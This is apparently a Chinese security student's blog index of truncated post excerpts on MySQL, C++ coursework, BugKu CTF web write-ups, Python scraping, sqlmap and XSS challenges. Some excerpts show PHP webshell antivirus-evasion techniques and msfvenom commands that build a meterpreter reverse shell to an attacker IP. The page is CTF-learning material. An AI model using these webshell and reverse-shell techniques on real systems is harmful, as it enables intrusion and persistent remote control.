- 博客(78)
- 收藏
- 关注
RSS订阅原创 mysql数据库插入中文没有显示
我想大多数刚刚接触mysql数据库时,也许在MySQL数据库插入中文会出现乱码。。。接下来也是小编我最近刚刚遇到的,翻了大多博客,最终解决了我的问题。。。。。预防下次出现同样问题,还要重新翻阅大量博客,仅此节约时间。 1.先附上一个链接,这是一篇写的挺详细的关于数据库中文乱码的解决方法,但与我遇到的问题关系不大,也还是记录下来,预防,预防。。。。。 https:...
2019-01-15 09:56:46
1203
原创 C++版课程设计--学生管理系统代码实现
#include<conio.h>#include<stdlib.h>#include<stdio.h>#include<string.h>#include<algorithm>#include<iostream>#include<fstream>using namespace std;class
2018-12-31 15:45:31
1793
原创 C语言计算器加载器代码实现
///计算器运算加载器#include <iostream>#include<stdio.h>#include<string.h>#include<stdlib.h>#include<math.h>#define MaxSize 1000#define MaxOp 1000using namespace std;st...
2018-12-31 15:44:05
467
转载 一句话木马变种免杀
常见的免杀方式: 字符串拼接 多方式传参免杀 回调函数 远程木马 伪协议后门 函数特性字符串拼接免杀: <?php $str = "abcdefs"; $s = substr($str,-1,1); $ev = 'a' . $s . 'sert'; $...
2018-12-31 15:42:00
3344
原创 C语言AES加解密代码实现
#include<stdio.h>#include<string.h>#include<string>#include<iostream>#include<unistd.h>#include<algorithm>using namespace std;#define Max 1024int S[16][16...
2018-12-31 15:40:14
5304
7
原创 BugKuCTF中套路满满的题--------flag.php
这道题目主要考察代码审计能力以及序列化和反序列化的知识首先,什么是序列化,什么是反序列化?简而言之,序列化,就是把对象转化为字节,反序列化就是把字节转化为对象的过程好了,开始实现解题吧。。。。首先进入的界面是一个登陆框然而不论输入什么,提交上去都是没有反应,抓包查看了一下,发现数据包是一个’get‘,所提交的数据更本没有发出去,联想到提示hint,或许这是一个参数,在URL里给...
2018-12-24 21:33:45
2523
原创 BugKuCTF套路满满的题--------文件包含2
首先讲一下这道题的思路,文件包含,什么是文件包含?其实简单来说就是通过一个文件传入参数(构造语句)去访问另一个文件,从而得到你所想要的东西。然而,这道题,除了文件包含的知识。还涉及到了文件上传的知识。毕竟,这两者总是相互存在在。。。。。好了,接下来,开始解题:首先进入的界面是一个欢迎界面,看URL里的参数得有一个参数file,查看源码可得有upload.php这个文件存在,那么改一下f...
2018-12-24 20:58:38
2006
1
原创 BugKuCTF中套路满满的题--------getshell
这道题目是一个关于文件上传的题目,而他的绕过机制是黑名单检测和类型检测黑名单检测:使用php5绕过,其他的(php3,phtml,php4.。。)都绕不过类型检测:抓包,改参数filename:2.php5 ,有两个Content-Type,先改第二个的Content-Type:image/jpeg ,再改第一个的Content-Type:Multipart/form-data;...
2018-12-19 11:20:39
1039
原创 BugKuCTF中套路满满的题-------Cookie欺骗
这一题,首先看题目,Cookie欺骗,那么什么是Cookie欺骗呢? 看了网上的一些博客后,我想可以总结一句话就是:你在火狐成功登陆了一个账号,并且把session_id记录下来,转而去其他浏览器登陆此账号,但此时的登陆不需要密码和账号,只需要把Session_id传给服务器,便可成功登陆 好了,话不多说,直接上。。。 首先,界面给出的是一串字符,当我想并没有什么用...
2018-12-19 10:25:22
2528
原创 BugKuCTF套路满满------你从哪里来,程序员本地网站
这两道题目其实都很相似。先说 程序员本地网站,这一题只需要抓包添加一个header头部参数,X-Forwarded-For:127.0.0.1在发送即可再说 你从哪里来,这道题和程序员本地网站大同小异,也是抓包添加一个header头部参数Referer:https://www.google.com即可。。。。。 ...
2018-12-12 10:03:34
1774
原创 BugKuCTF套路满满的题-------login1(SKCTF)
在进入这道题目之前,有提示说是SQL约束,这是什么鬼,,,,于是就有以下的。。。。。什么是SQL约束:这是注册页面代码:<?php// Checking whether a user with the same username exists$username = mysql_real_escape_string($_GET['username']);$password ...
2018-12-11 23:21:04
664
原创 BugKu中套路满满的题-------速度要快
这一题,首先进入的界面只有一句话,我感觉你得快点!!!查看源码发现下面还有一句话: OK ,now you have to post the margin what you find(上面个这句话是说明需要有post提交,参数为margin)那就抓包试试,,当你抓包发送出去的时候,你会发现,他给你返回base64加密的flag,嘿嘿。。。解密提交后发现是错误的!!那就再...
2018-12-09 16:56:22
1755
原创 BugKuCTF中套路满满的题--------网站被黑了
此题目进入后页面非常的华美,其实小编也想要这种鼠标类型的桌面,但苦于久久搜寻无果,一言难尽啊。。。。。好了话不多说,直接进入主题: 网站被黑,顾名思义,要黑掉他,但是怎么黑,放心,这里只是一个简单的拿到后台shell的操作首先,先用御剑扫一波 扫完结束后,有两个网页,进入第二个,得dao: 接下来就是爆破他的密码,使用burpsuit中的Intrude...
2018-12-07 12:03:20
2796
1
原创 BugKuCTF中套路满满的题-------备份是个好习惯
首先就点进去是一串字符d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e仔细看会发现这是两个一样的字符串,只不过拼接在一起了,MD5解密后的明文是 空再看题目的标题是备份,那么就看看本网页的备份文件把输入123.206.87.240:8002/web16/index.php.bak注:.bak...
2018-12-07 11:30:13
3837
原创 BugKuCTF中套路满满的题--------点击一百万次
这个需要查看源代码,看到一段javascript代码,仔细查看发现是POST-data注入 发送直接获得flag。。。
2018-12-07 11:07:06
804
转载 kali linux中meterpreter使用前的反弹shell及其基础语法
一.反弹shell的类型:1.reverse_tcp (基于TCP反向链接反弹shell)1).在kali linux终端中,生成一个反弹shelllinux版:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=你kali本机的IP lport=随便选一个端口来接收信息 -f elf -o shell如:msfveno...
2018-12-02 12:22:53
8851
原创 Ubuntu如何查看系统各种版本信息
1.查看系统内核信息uname -a //查看内核版本信息uname -m //查看系统位数2.查看系统版本信息lsb_release -a3.查看当前系统cat /etc/issue
2018-11-30 18:19:59
2938
原创 更换ubuntu里面更新源的方式 + 下载Docker
1.打开终端,输入sudo su2.对原来的更新源备份cp /etc/apt/sources.list /etc/apt/sources.list.backup3.修改更新源nano /etc/apt/sources.list删除sources.list里的所有东西,再重新将新的更新源粘贴进去进行替换//中科大的源deb http://mirrors.ust...
2018-11-29 21:27:56
515
原创 如何配置kali linux的中文输入法
1.先设置一下更新源可以自行去网上搜索最新的更新源,再在终端更新一下就好了2.在终端更新一下配置agt-get update3.安装一下fcitx小企鹅输入法apt-get install fctix fctix-goolepinyin4.配置一下linux的输入法1)打开小企鹅 2 )将中文输入法向上移到第一个 5.移动完成后再重启,...
2018-11-27 21:21:43
1624
原创 kali linux下的文件的创建,以及编辑保存
创建文件夹步骤:1.mkdir +desktop(路径)/ index(文件夹名)在桌面创建了一个index文件夹mkdir +123456 +desktop(路径)/ index.txt(文件夹名)在桌面创建了一个index.txt文件夹,但需要权限 123456 才能访问2.rm -(选项) +所要删除的文件绝对路径rm -r index将index的子目录及...
2018-11-24 19:13:30
34285
原创 类似MD5的密文又不够位数如何解?
今天在报一个数据库的密码的时候,爆出的是类似md5但又不够32位或16位的密文,接下来所述的只是我偶然发现的一个解法,当然,这种类型的我想不只只有这一种,在以后若是遇到其他的,我想我会慢慢积累下来。。。。 喏,这个就是我所爆出来的用户名及密文XPATH syntax error: '^$admina524f012e7b7b8d9dde40a6e1'在admin...
2018-11-22 23:11:00
1229
原创 DVWA里的其他用户登陆账号
DVWA中默认的五个用户名登陆 :1:admin/password2:gordonb/abc1233:1337/charley4:pablo/letmein5:smithy/password ...
2018-11-20 15:09:51
2049
原创 大数辗转相除
#include<stdio.h>#include<iostream>#include<string.h>#include<stdlib.h>using namespace std;#define Max 1000bool compare(string n,string m){ int len1=n.length(); ...
2018-11-20 14:58:37
493
原创 黑客动画吧-古墓探险之过关题解
这是小编今天份的练习 黑客动画吧-古墓探险附上连接http://hkyx.myhack58.com/点击链接,进入的网页一开始是这样的: 它并不像其他游戏一样直接是第一关,他给出你提示,要你自己去寻找关卡按照提示,机关在图片里,那么就用鼠标在图片里找机关,结果发现就在上述图片的雕像的头部有一个隐藏按钮,点击即可进入 第一关进入的界面是这样的,挺性感的...
2018-11-10 20:36:28
1735
原创 文件包含漏洞原理
什么是文件包含漏洞:PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为...
2018-11-10 11:29:16
7313
2
原创 python爬虫一些基本编码语句
#coding=utf-8import requestsimport refrom bs4 import BeautifulSoup#BeautifulSoup正则表达式搜索html = """<html><head><title>The Dormouse's story</title></head><bod
2018-11-10 10:26:04
448
原创 python 2.7 将网页上的数据下载到数据库
#coding = utf-8import requestsimport pymysqlimport reimport osfrom bs4 import BeautifulSoupfrom time import sleepdef main(): conn = pymysql.connect( host = '127.0.0.1', us...
2018-11-08 15:31:26
404
原创 python 2.7 音频《三国演义》下载
自己总结的一些思路:1.先到所要下载的音频的网页查找网络的一些基本信息(url,headers)2.在network里查找json文件,得到下载所在的网页路径3.开始编码4.先正则匹配到每章节的id和名称5.找到该章节下载所在的网页6.正则匹配下载网页里的下载网址7.以.m4a的 形式存到本地#coding=utf-8import requestsimport ref...
2018-11-02 21:02:53
438
原创 python 2.7 图片下载爬虫
写图片爬虫的一些心得1.先到所要下载图片的网址看看,页面请求的网址是哪个(我用的是goolge浏览器)2.点击所要下载的图片,查看其具体位置,(方便查找img链接)3.找好之后就可以写代码了4.主要难度是找到img=“”的具体位置,需要正则表达搜索一下不会正则的或是beautifulsoup的小伙伴可以参考一下这两个视屏beautifulsoup:https://www.y...
2018-10-31 21:29:34
564
转载 python爬虫之BeautifulSoup学习
1. Beautiful Soup的简介简单来说,Beautiful Soup是python的一个库,最主要的功能是从网页抓取数据。官方解释如下:Beautiful Soup提供一些简单的、python式的函数用来处理导航、搜索、修改分析树等功能。它是一个工具箱,通过解析文档为用户提供需要抓取的数据,因为简单,所以不需要多少代码就可以写出一个完整的应用程序。Beautiful Sou...
2018-10-30 20:37:24
258
转载 sqlmap之命令详解
sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage中英对照:Usage: python sqlmap.py [options] Options(选项): -h, --help Show basic help message and exit 显示此帮助消息并退出 ...
2018-10-16 21:54:20
255
原创 XSS通关小游戏以及我的挑战思路分享(XSS绕过代码)
level1这一关是一个很简单的测试,直接在url上改一下标签就行了。payload如下:127.0.0.1/XSS/level1.php?name=<script>alert(1)</script>level2这一关是一个比较典型的搜索框XSS,只需要构造一下闭合语句,将input语句<input name=keyword value="123...
2018-10-13 21:17:05
2408
原创 C语言DES密码学加密解密
此篇博客,仅此纪念国庆七天长假的折磨。。。///DES#include<stdio.h>#include<string.h>#include<string>using namespace std;int IP_Table[64] = { //IP置换矩阵 58, 50, ...
2018-10-13 16:29:15
797
转载 sqlmap学习笔记
1、简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别...
2018-10-13 16:26:29
375
原创 Java文件中有关错误提示的解决方法
1.用eclipse运行Java文件报错Error occurred during initialization of boot layer 2.编译时遇到 Resource leak: 'input' is never closed3.在编译Java文件时显示栏没有了解决方法:window------->Show view --------->Conso...
2018-10-13 16:24:04
965
原创 大数四则运算的简单算法
大数相加题目:任意两个数相加,计算结果还有种特殊情况 这个题目中的两个数可能为正,可能为负第一种情况,为正思路:1.将字符串倒序并转化为数字2.逐位相加,并存入数组s[i]3.对数组进行进制换算(这里有个需要特别注意的是 换算到最后,要考虑最后一位进制k值是否为零)4.将数组反序输出所用代码如下#include<stdio.h>#include&l...
2018-09-22 20:07:06
1096
原创 数据库MySQL基础语法的学习笔记
目录 1.进入数据库2.创建数据库3.创建数据表4.数据类型5.表的增删修改操作6.查询的扩展7.表的修改、8.表的复制 1.进入数据库找出自己主机数据库的位置,再使用Dos.指令进入自己主机的数据库MySQL -hlocalhost -uroot -p;password:********2.创建数据库创建数据库:creat da...
2018-09-16 11:46:22
310
原创 Java 的输入,输出
输入Scanner 输入(1)首先创建Scanner对象,接受从控制台输出Scanner input=new Scanner(System.in);(2)可以接受String 类型String str=input next();亦可以接受int()类型int n=input nextlnt();(3)在主函数的末尾要添上一句输入关闭的语句input.close...
2018-09-13 16:18:07
316
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人